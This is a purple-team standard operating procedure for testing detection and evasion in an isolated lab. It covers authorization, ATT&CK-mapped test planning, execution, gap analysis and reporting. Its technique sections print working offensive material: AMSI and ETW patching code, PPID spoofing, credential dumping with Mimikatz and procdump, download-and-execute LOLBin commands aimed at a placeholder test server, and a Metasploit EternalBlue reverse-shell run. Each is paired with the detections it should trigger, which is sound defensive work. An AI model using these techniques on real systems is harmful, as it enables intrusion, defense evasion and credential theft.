Synced from an Obsidian vault
For graph and advanced features, download the full Intel Codex Vault and open it in Obsidian.
Detection & Evasion Testing SOP (Purple Team)
Purpose: Validate detection coverage by simulating adversary techniques in a controlled environment. Test both detection capabilities (blue team) and evasion techniques (red team) to improve security posture.
Lab Only: Never test evasion techniques in production without explicit authorization and coordination.
Table of Contents
- Detection & Evasion Testing SOP (Purple Team)
- Table of Contents
- 1. Pre-Engagement & Authorization
- 2. Threat Intelligence & Hypothesis Development
- 3. Test Planning & Scenario Design
- 4. Adversary Simulation Tools & Techniques
- 5. Execution & Monitoring
- 6. Analysis & Gap Identification
- 7. Reporting & Improvement
- 8. Safety & Legal
- 9. Tools Reference
- 10. Common Pitfalls
- Related SOPs
1. Pre-Engagement & Authorization
Authorization Requirements
Mandatory Approvals:
- Written authorization from CISO/Security Leadership
- IT Operations approval (lab infrastructure usage)
- SOC/Incident Response team briefing and consent
- Legal review (if applicable)
- Change control board approval (if required)
Scope Definition:
Authorization Must Include:
- Test environment boundaries (specific systems/networks)
- Allowed techniques and tools
- Testing timeframe and schedule
- Halt criteria and escalation procedures
- Authorized testers (names and contact info)
- Success/failure criteria
Lab Environment Requirements
Isolated Test Environment:
# Infrastructure requirements:
1. Isolated network segment (no production connectivity)
2. Dedicated test systems (VMs preferred for snapshots)
3. Separate telemetry pipeline (non-production SIEM/EDR)
4. Snapshot capability for rapid rollback
5. Representative configuration (mirrors production controls)
# Network isolation verification:
- Firewall rules blocking production access
- Air-gapped or dedicated VLAN
- Separate Active Directory domain (if applicable)
- Test accounts only (no production credentials)
Pre-Test Checklist:
- Baseline snapshots created for all test systems
- Monitoring/logging confirmed operational
- Sysmon config version pinned and recorded (legacy
SwiftOnSecurity/sysmon-configis community-maintained but no longer the default —olafhartong/sysmon-modularis the current de-facto reference because it splits config by ATT&CK technique, supports merging, and is actively updated) - EDR sensor build / signature version recorded (so a regression vs. a missed detection can be told apart on re-test)
- Test accounts created and validated
- SOC notified of test window
- Rollback procedures documented and tested
- Communication channels established (Slack, Teams, etc.)
- Halt signal defined (safe word, email, emergency contact)
Disclosure-Ready Posture
Stand up the evidence pipeline at engagement start so the post-test report is a query, not archaeology.
- Per-technique ATT&CK pin: tag every executed procedure with
Txxxx[.yyy]against ATT&CK Enterprise v18.1 (released 2025-10-28) plus the procedure variant (e.g.,T1055.013viaLoadLibraryEx + VirtualProtectmodule stomping;T1106direct-syscall via Hell's-Gate vs. Halo's-Gate). Pin the matrix release once at engagement start so technique IDs stay reproducible across re-tests. - Pre/post-detection state per technique: log (a) what fired (alert ID, rule name, detection source), (b) what stayed silent, (c) time-to-detect delta vs. the §3 success thresholds. A "silent" outcome is evidence, not its absence — record it explicitly so the gap can be tuned later.
- Raw telemetry preservation: snapshot EDR raw event ring, Sysmon
.evtx, PowerShell Operational, ETW provider traces, and any pcap before lab-revert clears them. Hash every export and record acquisition timestamp + tool version per Collection Log chain-of-custody conventions. - Blue-team handoff package: at exercise close ship (i) a landed / caught / needs-tuning table keyed by ATT&CK ID, (ii) the §6 gap analyses, (iii) draft Sigma rules for upstream contribution to
SigmaHQ/sigmaandolafhartong/sysmon-modular(usesigma-clifor backend conversion), (iv) sensor-tuning recommendations with priority. Disclosure of novel EDR-blind techniques to vendor PSIRTs or upstream maintainers follows Reporting, Packaging & Disclosure. - IOC defanging: payload hashes, C2 domains, and beacon URLs leaving the lab in reports use
hxxp/[.]/[@]convention so analyst inboxes and link unfurlers don't auto-fetch. - Legal & OPSEC anchors: every engagement-log entry references its written authorization — see Legal & Ethics for the canonical framework (CFAA / Computer Misuse Act / Cybercrime Directive) and OPSEC for tester-side hygiene (separated test identities, out-of-band comms with the SOC, no production-credential reuse on the lab side).
2. Threat Intelligence & Hypothesis Development
Threat Modeling
Identify Threat Actors Relevant to Organization:
- APT groups targeting your industry (financial, healthcare, energy, etc.)
- Commodity malware and ransomware families
- Insider threats (malicious and negligent)
- Supply chain attack vectors
MITRE ATT&CK Framework Mapping:
Pin every test plan to a specific ATT&CK release so technique IDs and sub-technique decompositions stay reproducible. Current Enterprise release: v18.1 (released 2025-10-28). Re-validate technique IDs after each release — sub-technique IDs are occasionally renumbered, deprecated (e.g., merged into a parent), or split.
Select tactics/techniques to test based on:
1. Threat intelligence (active campaigns targeting your sector)
2. Recent incidents or near-misses
3. Control gaps identified in prior assessments
4. New detection capabilities being validated
Example Focus Areas:
- Initial Access: Phishing, exploiting public-facing apps
- Execution: PowerShell, WMI, scheduled tasks
- Persistence: Registry run keys, services, scheduled tasks
- Privilege Escalation: UAC bypass, token manipulation
- Defense Evasion: Obfuscation, process injection, AMSI bypass
- Credential Access: Credential dumping, Kerberoasting
- Discovery: Network scanning, user enumeration
- Lateral Movement: Pass-the-Hash, RDP, PsExec
- Collection: Screen capture, clipboard data
- Exfiltration: C2 channels, DNS tunneling
Hypothesis Formulation
Detection Hypotheses (Blue Team Perspective):
Example Hypotheses:
1. "Our EDR will detect PowerShell obfuscation using Base64 encoding"
2. "Sysmon Event ID 10 (Process Access) will capture credential dumping via LSASS"
3. "SIEM correlation rule will alert on multiple failed login attempts followed by success"
4. "Network monitoring will detect C2 beaconing patterns"
5. "File integrity monitoring will alert on unauthorized changes to system binaries"
Hypothesis Template:
"When [RED TEAM ACTION], we expect [BLUE TEAM CONTROL] to [DETECT/ALERT/BLOCK] within [TIME THRESHOLD] with [FIDELITY LEVEL]"
3. Test Planning & Scenario Design
Control Coverage Matrix
Map Techniques to Controls:
| MITRE Technique | Detection Control | Expected Alert | Coverage Gap |
|-----------------|-------------------|----------------|--------------|
| T1059.001 (PowerShell) | EDR + Script Block Logging | High confidence alert | None |
| T1003.001 (LSASS Dump) | Sysmon Event ID 10 + EDR | Critical alert | Memory only |
| T1021.001 (RDP) | Windows Security Event 4624 | Medium alert | No lateral movement correlation |
| T1071.001 (C2 Web) | Proxy logs + NetFlow | Low alert (noise) | Need tuning |
Success Metrics
Define Measurable Outcomes:
- Detection Rate: % of techniques detected by at least one control
- Time to Detect (TTD): Median time from execution to alert generation
- Time to Triage (TTT): Time from alert to analyst investigation
- False Positive Rate: Alerts generated by benign test activity
- Fidelity: Quality of alert context (high/medium/low confidence)
- Coverage: % of ATT&CK matrix covered by active detections
Example Thresholds:
Success Criteria:
- Detection Rate: ≥ 80% for critical techniques
- TTD: ≤ 5 minutes for in-memory attacks
- TTT: ≤ 15 minutes during business hours
- False Positive Rate: ≤ 5% of total alerts
- High Fidelity Alerts: ≥ 60% of detections
Test Scenarios
Scenario Template:
## Scenario: Credential Dumping via Mimikatz
**Objective**: Validate detection of credential theft
**MITRE Techniques**:
- T1003.001 (LSASS Memory Dump)
- T1003.002 (Security Account Manager)
**Expected Detections**:
1. EDR behavioral detection (process injection into LSASS)
2. Sysmon Event ID 10 (ProcessAccess to lsass.exe)
3. SIEM correlation (suspicious process + LSASS access + privilege token use)
**Execution Steps**:
1. Launch Mimikatz from test directory
2. Execute: `sekurlsa::logonpasswords`
3. Document alerts generated
4. Verify credential hashes NOT exported (benign test only)
**Cleanup**:
- Terminate Mimikatz process
- Delete test artifacts
- Restore snapshot if persistence was tested
4. Adversary Simulation Tools & Techniques
Red Team Testing Frameworks
MITRE Caldera:
# Automated adversary emulation platform — current line: v5.x (v5.3.0 released 2025-04-24)
# https://github.com/mitre/caldera
# Install (v5+ requires --recursive for plugin submodules and --build to bundle the VueJS UI)
git clone https://github.com/mitre/caldera.git --recursive
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure --build
# Heed CVE-2025-27364 (RCE in v5.0.0 — fixed in v5.1.0+); patch before any lab use.
# Access: http://localhost:8888 (default creds: admin/admin — change immediately)
# Select adversary profile (e.g., APT29, Hunter, Discovery, Stealthy Operator)
# Deploy agent (Sandcat / Manx / Ragdoll) to test system
# Execute operation and observe detections
Atomic Red Team:
# Atomic tests for ATT&CK techniques (test definitions in YAML — invoke-atomicredteam is the runner)
# https://github.com/redcanaryco/atomic-red-team
# https://github.com/redcanaryco/invoke-atomicredteam
# Install runner + YAML dependency (canonical PowerShell Gallery install)
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser
# Install the atomics test definitions (separate repo — pulled by the runner on first invoke,
# or pre-stage via Install-AtomicRedTeam):
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
# Import
Import-Module Invoke-AtomicRedTeam
# Show prerequisites and test details before executing
Invoke-AtomicTest T1059.001 -ShowDetails
Invoke-AtomicTest T1059.001 -CheckPrereqs
Invoke-AtomicTest T1059.001 -GetPrereqs
# Execute specific test (technique → test number is the canonical reference, e.g., T1059.001-1)
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Execute by Auto-Generated GUID (one per atomic — preferred for CI/automation runs)
Invoke-AtomicTest T1003.001 -TestGuids "a96872b2-cbf3-46cf-8eb4-27e8c0e85660"
# Cleanup after test (only some atomics implement -Cleanup; verify with -ShowDetails)
Invoke-AtomicTest T1059.001 -Cleanup
Infection Monkey:
# Automated lateral movement and network propagation testing
# Akamai (which acquired Guardicore in 2021) ended commercial sponsorship; the project
# remains open-source under Akamai's GitHub org.
# https://github.com/guardicore/monkey [verify 2026-04-25 — confirm release activity / fork status]
# Deploy in isolated network
# Configure targets (test systems only)
# Select attack techniques
# Execute and monitor propagation
# Review telemetry in dashboard
Cobalt Strike (Commercial):
# C2 framework for red team operations
# Use only with proper licensing and authorization
# Features:
- Beacon implant deployment
- Process injection techniques
- Lateral movement via PsExec, WMI, SSH
- Credential harvesting
- Evasion capabilities (malleable C2, AMSI bypass)
# Purple team use:
- Test detection of C2 beacons
- Validate network monitoring (JA3, DNS, HTTP patterns)
- Test EDR behavioral detections
Metasploit Framework:
# Open-source penetration testing framework
msfconsole
# Example: Test SMB exploit detection
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit
# Verify detection of:
# - Network scan (Nmap/Metasploit pre-exploitation)
# - SMB exploit attempt
# - Reverse shell connection
# - Meterpreter process injection
Specific Evasion Techniques to Test
1. PowerShell Obfuscation:
# Base64 encoding
$command = "Write-Host 'Test Detection'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encoded
# String concatenation
$c1 = "Write"
$c2 = "-Host"
$c3 = "'Evade Detection'"
IEX "$c1$c2 $c3"
# Invoke-Expression with download
IEX (New-Object Net.WebClient).DownloadString('http://test-server/script.ps1')
# Expected Detections:
# - Script Block Logging (Event ID 4104)
# - Module Logging (Event ID 4103)
# - EDR behavioral detection (suspicious script execution)
2. LOLBins (Living Off the Land Binaries):
# MSBuild.exe (code execution)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe malicious.csproj
# Regsvr32.exe (COM scriptlet execution)
regsvr32 /s /n /u /i:http://test-server/test.sct scrobj.dll
# CertUtil (file download)
certutil -urlcache -split -f http://test-server/payload.exe payload.exe
# Expected Detections:
# - Process creation from unusual parent (Sysmon Event ID 1)
# - Network connection from unexpected binary (Sysmon Event ID 3)
# - Command-line logging showing suspicious parameters
3. Process Injection (T1055):
# Classic primitives — validate baseline coverage first
# DLL Injection (T1055.001)
# CreateRemoteThread → LoadLibraryA on target with attacker-controlled DLL path
# Process Hollowing (T1055.012)
# CreateProcess(SUSPENDED) → NtUnmapViewOfSection → WriteProcessMemory → SetThreadContext → ResumeThread
# Reflective DLL Injection
# Map DLL into RWX heap, fix relocations + IAT, jump to DllMain — no LoadLibrary, no disk artifact
# APC Injection (T1055.004)
# OpenThread(ALERTABLE) → QueueUserAPC pointing at shellcode/LoadLibrary
# Modern variants — these often defeat naïve EDR coverage and MUST be on the test plan:
# Module Stomping / DLL Hollowing (frequently mapped to T1055.013 lineage; classification is contested)
# LoadLibraryEx of a benign signed DLL → VirtualProtect(PAGE_EXECUTE_READWRITE) on its .text →
# overwrite with shellcode → execute under the trusted module's name. Host process is NOT suspended,
# which is the key distinguisher from process hollowing.
# Direct Syscalls / Hell's Gate / Halo's Gate / Tartarus Gate (T1106 — Native API)
# Resolve System Service Numbers (SSNs) by walking ntdll exports, then issue raw `syscall` (x64)
# or `sysenter` (x86) for NtAllocateVirtualMemory / NtProtectVirtualMemory / NtWriteVirtualMemory /
# NtCreateThreadEx / NtMapViewOfSection. EDR user-mode hooks on those ntdll exports never fire.
# See sop-malware-analysis §10.4 for the static/dynamic fingerprints.
# Expected Detections (classic):
# - Sysmon Event ID 8 (CreateRemoteThread) — DLL injection, classic remote-thread shellcode
# - Sysmon Event ID 10 (ProcessAccess with PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD)
# - Sysmon Event ID 25 (ProcessTampering) — process hollowing / image replacement (Sysmon v13+)
# - Sysmon Event ID 7 (ImageLoad) — unsigned or unexpected DLL loaded into a sensitive process
# - EDR behavioral: RWX allocation in remote process, thread start address outside any image
# Validation Methodology for the modern variants:
# - Module stomping: detection requires correlating ImageLoad (legitimate DLL) with subsequent
# page-protection change + write to that DLL's range. Most stock Sysmon configs do NOT cover this.
# - Direct syscalls: kernel-side telemetry (ETW Threat-Intelligence provider via PsSetCreateThreadNotifyRoutine /
# ObRegisterCallbacks / kernel callbacks) is the only reliable signal. If the EDR is purely user-mode hooking,
# expect zero detection — record this as a known gap.
4. AMSI / ETW Tampering (T1562.001 — Disable or Modify Tools; T1562.006 — Indicator Blocking):
# AMSI (Anti-Malware Scan Interface) bypass — script-engine instrumentation
# Reference values (per Microsoft Learn — amsi.h):
# AMSI_RESULT_CLEAN = 0
# AMSI_RESULT_NOT_DETECTED = 1
# AMSI_RESULT_DETECTED = 32768 (0x8000)
# E_INVALIDARG = 0x80070057 (HRESULT — caller treats as "scan failed → fail-open")
# Two common patch shapes, both target user-mode amsi.dll:
# (a) Force AmsiScanBuffer to return S_OK + AMSI_RESULT_CLEAN → buffer treated as benign
# (b) Force AmsiScanBuffer to return E_INVALIDARG → caller's fail-open path
# Reflection-based bypass (the 2018 Matt Graeber technique — well-known, AV-signatured, detected
# by AMSI itself via Script Block Logging; useful to validate that baseline AMSI/SBL still catches it):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# More representative of modern offensive tradecraft — patch AmsiScanBuffer in process memory
# (validate EDR memory-integrity / page-protection-change detection rather than string signatures):
# 1. LoadLibrary("amsi.dll")
# 2. GetProcAddress("AmsiScanBuffer")
# 3. VirtualProtect(addr, 6, PAGE_EXECUTE_READWRITE, &old)
# 4. WriteProcessMemory with a 6-byte stub: mov eax, 0x80070057 ; ret (x64: B8 57 00 07 80 C3)
# 5. VirtualProtect(addr, 6, old, &old)
# ETW patching (T1562.006) — blinds Event Tracing for Windows for the process lifetime:
# 1. GetProcAddress(ntdll, "EtwEventWrite") (or "NtTraceEvent")
# 2. VirtualProtect → write 0xC3 (single `ret`) over the function prologue
# Effect: every ETW provider (including the Microsoft-Windows-Threat-Intelligence provider that most
# EDRs subscribe to) goes silent for that process. Pair this with a syscall-based loader and a hooked
# EDR is effectively blind in user-mode.
# Expected Detections:
# - PowerShell Script Block Logging (Event ID 4104) — captures the bypass content even when AMSI is patched
# - Sysmon Event ID 10 (ProcessAccess) on amsi.dll / ntdll.dll address ranges with PROCESS_VM_WRITE
# - EDR memory-integrity: page-protection change on amsi.dll!AmsiScanBuffer or ntdll!EtwEventWrite
# - Suspicious-import telemetry: GetProcAddress("AmsiScanBuffer") | GetProcAddress("EtwEventWrite")
# - Provider-side: absence of expected ETW events from a process that should be emitting them (anomaly hunt)
# Cross-reference: see sop-malware-analysis.md §10.4 for the offensive static/dynamic fingerprints
# this section is validating against.
5. Credential Dumping:
# Mimikatz
mimikatz.exe "sekurlsa::logonpasswords" "exit"
# Impacket secretsdump
secretsdump.py -sam sam.save -system system.save LOCAL
# ProcDump + Mimikatz (two-stage)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Transfer lsass.dmp offline, analyze with Mimikatz
# Expected Detections:
# - Sysmon Event ID 10 (ProcessAccess to lsass.exe)
# - EDR behavioral (credential access pattern)
# - Security Event 4656 (handle to LSASS)
6. PPID Spoofing (T1134.004 — Parent PID Spoofing):
// Forge a child process's parent so logs show explorer.exe → cmd.exe instead of winword.exe → cmd.exe.
// Canonical Win32 API sequence (per Microsoft Learn — UpdateProcThreadAttribute):
HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, target_pid); // e.g., explorer.exe PID
SIZE_T size = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
LPPROC_THREAD_ATTRIBUTE_LIST attrs = HeapAlloc(GetProcessHeap(), 0, size);
InitializeProcThreadAttributeList(attrs, 1, 0, &size);
UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hParent, sizeof(HANDLE), NULL, NULL);
STARTUPINFOEX si = { sizeof(si) };
si.lpAttributeList = attrs;
PROCESS_INFORMATION pi = { 0 };
CreateProcessW(NULL, L"cmd.exe", NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
# Expected Detections:
# - Sysmon Event ID 1 (ProcessCreate) — ParentImage no longer matches the user-perceived parent.
# Look for: ProcessAccess (Event ID 10) on the spoofed parent PID with PROCESS_CREATE_PROCESS rights
# immediately preceding a ProcessCreate event whose ParentProcessId matches.
# - EDR behavioral: implausible parent-child pairs (e.g., explorer.exe → powershell.exe with -enc)
# correlated with prior OpenProcess on explorer.exe from an Office process.
# - Windows Security Event 4688 (audit ProcessCreation) when "Audit: Include command line"
# is enabled — captures the real creating process via SubjectLogonId / TokenElevationType.
7. Callback-based Shellcode Execution (T1055 — sub-techniques vary):
// Avoids CreateThread / CreateRemoteThread (heavily monitored) by passing the shellcode
// pointer as the callback argument to a legitimate Windows API. The OS dispatches it for you.
// Common primitives:
// EnumChildWindows(hwnd, (WNDENUMPROC)shellcode, 0);
// EnumDesktopWindows(NULL, (WNDENUMPROC)shellcode, 0);
// CreateTimerQueueTimer(&hTimer, NULL, (WAITORTIMERCALLBACK)shellcode, NULL, 0, 0, 0);
// SetTimer(NULL, 0, 100, (TIMERPROC)shellcode);
// EnumSystemLocalesA((LOCALE_ENUMPROCA)shellcode, 0);
// EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)shellcode, LOCALE_USER_DEFAULT, 0, NULL);
// TpAllocWork / TpPostWork / TpReleaseWork (threadpool — no thread-creation event)
# Validation Methodology:
# - Allocate RWX with VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE), copy shellcode, dispatch via callback.
# - Detection target is NOT a thread-creation event (none fires) — must be one of:
# * RWX allocation in the process (Sysmon does not log VirtualAlloc; EDR memory-scan required)
# * Thread start address that resolves outside any loaded module (EDR / pe-sieve / hollows_hunter)
# * ETW Threat-Intelligence provider events for ALPC/Threadpool work items pointing at private memory
# - If your EDR depends solely on CreateRemoteThread + LoadLibrary signatures, expect zero detection
# and record this as a P1 gap.
5. Execution & Monitoring
Execution Protocol
Pre-Execution:
# 1. Verify test environment isolation
ping production-server.example.com # Should fail
# 2. Confirm monitoring is active
# Check SIEM/EDR console for heartbeat from test systems
# 3. Notify SOC via designated channel
"Purple Team Test START - Scenario: [NAME] - Expected Duration: [TIME]"
# 4. Start packet capture (if network testing)
tcpdump -i eth0 -w test_capture.pcap
# 5. Document baseline state
Get-Process > pre_test_processes.txt # Windows
ps aux > pre_test_processes.txt # Linux
During Execution:
# Execute technique with detailed logging
# Example: PowerShell with transcript
Start-Transcript -Path C:\Logs\purple_team_test.log
# [Execute test technique]
Stop-Transcript
# Monitor for alerts in real-time
# - SIEM dashboard
# - EDR console
# - Email/Slack notifications
# Document observations:
- Time of execution (UTC)
- Command/tool used
- Alerts generated (alert ID, rule name, timestamp)
- False positives triggered
- Detection gaps (no alert when expected)
Post-Execution:
# 1. Execute cleanup procedures
Remove-Item C:\Temp\test_payload.exe
Remove-Item HKCU:\Software\Test\PersistenceKey
# 2. Verify cleanup
Get-ChildItem C:\Temp\test_* # Should be empty
# 3. Collect telemetry
# Export SIEM alerts for test window
# Export EDR events for test endpoints
# Save packet capture
# 4. Notify SOC of test completion
"Purple Team Test END - Scenario: [NAME] - Review alerts and provide feedback"
# 5. Restore snapshot if destructive testing occurred
# VMware: Revert to snapshot "pre_purple_test"
# Hyper-V: Apply checkpoint
Data Collection
Telemetry Sources to Review:
# Windows Event Logs
wevtutil epl Security C:\Logs\Security_test.evtx
wevtutil epl System C:\Logs\System_test.evtx
wevtutil epl "Microsoft-Windows-Sysmon/Operational" C:\Logs\Sysmon_test.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" C:\Logs\PowerShell_test.evtx
# Linux Logs
cp /var/log/syslog /evidence/syslog_test.txt
cp /var/log/auth.log /evidence/auth_test.txt
journalctl --since "2025-10-05 14:00:00" --until "2025-10-05 15:00:00" > journalctl_test.txt
# EDR/SIEM Exports
# Export alerts matching test timeframe
# Export raw events from test endpoints
# Document query used and export format
6. Analysis & Gap Identification
Detection Coverage Analysis
For Each Tested Technique:
## Technique: T1059.001 (PowerShell)
**Test Executed**: Base64-encoded PowerShell command
**Command**: `powershell.exe -encodedCommand [BASE64]`
**Timestamp**: 2025-10-05 14:32:15 UTC
**Detection Results**:
✅ **Detected by**:
- EDR: Alert "Suspicious PowerShell Execution" (High confidence)
- Sysmon: Event ID 1 (Process Creation) logged command line
- PowerShell Script Block Logging: Event ID 4104 captured decoded script
❌ **Missed by**:
- SIEM correlation rule (no alert generated)
- Network monitoring (no DNS/HTTP activity to correlate)
**Detection Quality**:
- TTD (Time to Detect): 12 seconds
- TTT (Time to Triage): 8 minutes (analyst reviewed alert)
- Fidelity: High (low false positive history for this rule)
- Context: Full command line captured, parent process identified
**Gap Analysis**:
- SIEM rule not tuned for encoded PowerShell (only checks for "-encodedCommand" flag)
- No correlation with user behavior analytics (was this user expected to run PowerShell?)
**Recommendations**:
1. Update SIEM rule to decode Base64 and search for known malicious patterns
2. Implement UBA baseline for PowerShell usage per user/role
3. Alert on PowerShell from unusual parent processes (Word, Excel, etc.)
False Positive Analysis
Document Benign Activity Triggering Alerts:
False Positive Example:
- Alert: "Credential Access via Registry"
- Trigger: Legitimate backup software reading SAM hive
- Root Cause: Rule too broad (any registry access to SAM/SECURITY)
- Recommendation: Add exception for backup process (signed binary, expected schedule)
Evasion Success Tracking
If Technique Evaded Detection:
## Evasion Success: Process Injection via QueueUserAPC
**Technique**: T1055.004 (Asynchronous Procedure Call)
**Tool**: Custom injector
**Why Detection Failed**:
1. EDR heuristics did not flag QueueUserAPC API call
2. Sysmon Event ID 8 (CreateRemoteThread) not triggered (different injection method)
3. No memory scanning at time of injection
**Exploit Conditions**:
- Unsigned injector binary
- Injection into legitimate process (explorer.exe)
- No network activity post-injection (stayed dormant)
**Remediation**:
- Implement ETW (Event Tracing for Windows) monitoring for thread creation APIs
- Add memory scanning on suspicious process access events
- Deploy YARA rules to detect injection frameworks
7. Reporting & Improvement
Executive Summary Template
# Purple Team Exercise Report
**Date**: 2025-10-05
**Duration**: 4 hours
**Participants**: Red Team (3), Blue Team (5), SOC (2)
## Objectives
Validate detection coverage for credential access and lateral movement techniques used by APT29.
## Summary
- **Techniques Tested**: 12
- **Techniques Detected**: 9 (75%)
- **High-Fidelity Alerts**: 7 (78%)
- **False Positives**: 3
- **Critical Gaps**: 3 (privilege escalation, evasion, persistence)
## Key Findings
✅ **Strengths**:
- PowerShell logging and EDR provide excellent coverage
- Lateral movement via RDP detected consistently
- Credential dumping from LSASS detected in < 30 seconds
❌ **Weaknesses**:
- Process injection techniques evaded EDR behavioral detection
- LOLBins (MSBuild, Regsvr32) not monitored
- C2 beaconing patterns not correlated in SIEM
## Recommendations
1. **Immediate**: Deploy Sysmon config update for process injection monitoring
2. **Short-term** (30 days): Implement LOLBin detection rules (Sigma/Splunk)
3. **Long-term** (90 days): Enhance C2 detection with JA3 fingerprinting and beaconing analysis
Improvement Tracking
Action Items with Owners:
| Priority | Finding | Recommended Action | Owner | Due Date | Status |
|----------|---------|-------------------|-------|----------|--------|
| P1 | Process injection not detected | Deploy Sysmon config v15 | SecOps | 2025-10-12 | In Progress |
| P1 | MSBuild execution not alerted | Create SIEM rule for LOLBins | SOC Lead | 2025-10-15 | Pending |
| P2 | C2 beaconing not correlated | Implement JA3/JA3S monitoring | NetSec | 2025-11-01 | Planning |
| P3 | UBA not detecting anomalous PowerShell | Tune UBA baseline for PowerShell | SIEM Admin | 2025-12-01 | Backlog |
8. Safety & Legal
Safety Protocols
❌ Never:
- Test in production without isolated telemetry
- Use real malware or exploit kits
- Exfiltrate actual sensitive data
- Perform denial of service attacks
- Pivot beyond authorized scope
- Test without SOC coordination
✅ Always:
- Use benign simulators (Atomic Red Team, Caldera)
- Maintain rollback capability (snapshots)
- Coordinate timing with SOC
- Document every action with timestamps
- Verify isolation before execution
- Stop immediately on unexpected behavior
Legal Considerations
Authorization Documentation:
- Signed approval from CISO/CIO
- Scope clearly defined and acknowledged
- Indemnification (if external red team involved)
- NDA/confidentiality agreements
- Safe harbor clause for good-faith testing
Compliance:
- No violations of Computer Fraud and Abuse Act (CFAA)
- Respect organizational acceptable use policies
- No testing of third-party services without consent
- Proper handling of any discovered vulnerabilities
9. Tools Reference
| Tool | Purpose | Link |
|---|---|---|
| Red Team Frameworks | ||
| Atomic Red Team | Technique-specific tests (atomics in YAML, Invoke-AtomicRedTeam runner) | github.com/redcanaryco/atomic-red-team |
| MITRE Caldera | Automated adversary emulation (v5+ requires --recursive --build) | github.com/mitre/caldera |
| Infection Monkey | Lateral movement testing (formerly Guardicore, now Akamai) | github.com/guardicore/monkey |
| Cobalt Strike | C2 framework (commercial — Fortra) | cobaltstrike.com |
| Metasploit | Exploitation framework | metasploit.com |
| Evasion / Anti-Analysis Validation | ||
| al-khaser | 170+ anti-VM / anti-debug / anti-sandbox checks; validate VM hardening before evasive-sample tests | github.com/LordNoteworthy/al-khaser |
| pafish | Lightweight VM/sandbox detection tester; faster pre-flight than al-khaser | github.com/a0rtega/pafish |
| pe-sieve | Scans a running PID for hollowed sections, RWX shellcode, replaced modules; dumps for static review | github.com/hasherezade/pe-sieve |
| hollows_hunter | Same family as pe-sieve, scans system-wide | github.com/hasherezade/hollows_hunter |
| ScyllaHide | x64dbg / OllyDbg / IDA plugin — patches PEB.BeingDebugged, NtGlobalFlag, NtQueryInformationProcess, GetTickCount, exception-based checks | github.com/x64dbg/ScyllaHide |
| TitanHide | Kernel-mode debugger-hiding driver for samples that bypass user-mode hooks via direct syscalls | github.com/mrexodia/TitanHide |
| Detection Tools | ||
| Sysmon | Windows event logging (v15+ adds Event ID 26 FileDeleteDetected; v13+ has Event ID 25 ProcessTampering) | learn.microsoft.com/sysinternals/downloads/sysmon |
| sysmon-modular | Modular Sysmon config split by ATT&CK technique (current reference) | github.com/olafhartong/sysmon-modular |
| sysmon-config (SwiftOnSecurity) | Legacy community Sysmon config; still useful as a baseline | github.com/SwiftOnSecurity/sysmon-config |
| Sigma | Generic detection rules | github.com/SigmaHQ/sigma |
| sigma-cli | Sigma → SIEM converter (replaces deprecated sigmac) | github.com/SigmaHQ/sigma-cli |
| YARA | Pattern matching | virustotal.github.io/yara |
| Analysis | ||
| ATT&CK Navigator | Technique coverage mapping (pin to v18.1) | mitre-attack.github.io/attack-navigator |
| DeTT&CT | Detection coverage scoring | github.com/rabobank-cdc/DeTTECT |
10. Common Pitfalls
- ❌ Testing without proper authorization (legal risk)
- ❌ Using production systems (availability/integrity risk)
- ❌ Not coordinating with SOC (alert fatigue, missed detections)
- ❌ Forgetting cleanup procedures (persistence artifacts remain)
- ❌ Not documenting methodology (can't reproduce results)
- ❌ Testing too many techniques at once (difficult to correlate)
- ❌ Ignoring false positives (alert tuning opportunity missed)
- ❌ Not retesting after remediation (validate fixes)
- ❌ Poor communication (red/blue team siloed)
- ❌ Treating this as red team vs. blue team (collaborative improvement, not competition)
Related SOPs
Analysis:
- Reverse Engineering - Analyzing evasion techniques in binaries
- Cryptography Analysis - Encryption-based evasion methods
- Malware Analysis - Malware evasion technique analysis (see §10.4 "Modern EDR / AV Evasion Techniques" for the offensive complement to §4.2 of this SOP — ETW patching, AMSI bypass, direct syscalls, PPID spoofing, module stomping, callback execution, with static + dynamic fingerprints)
Pentesting & Security:
- Active Directory Pentesting - AD-specific evasion techniques
- Linux Pentesting - Linux evasion and anti-forensics
- Web Application Security - WAF and IDS/IPS bypass
- Mobile Security - Mobile platform evasion techniques
- Vulnerability Research - Testing exploit detection
- Bug Bounty Hunting - Understanding detection evasion for responsible disclosure
- Forensics Investigation - Testing anti-forensics effectiveness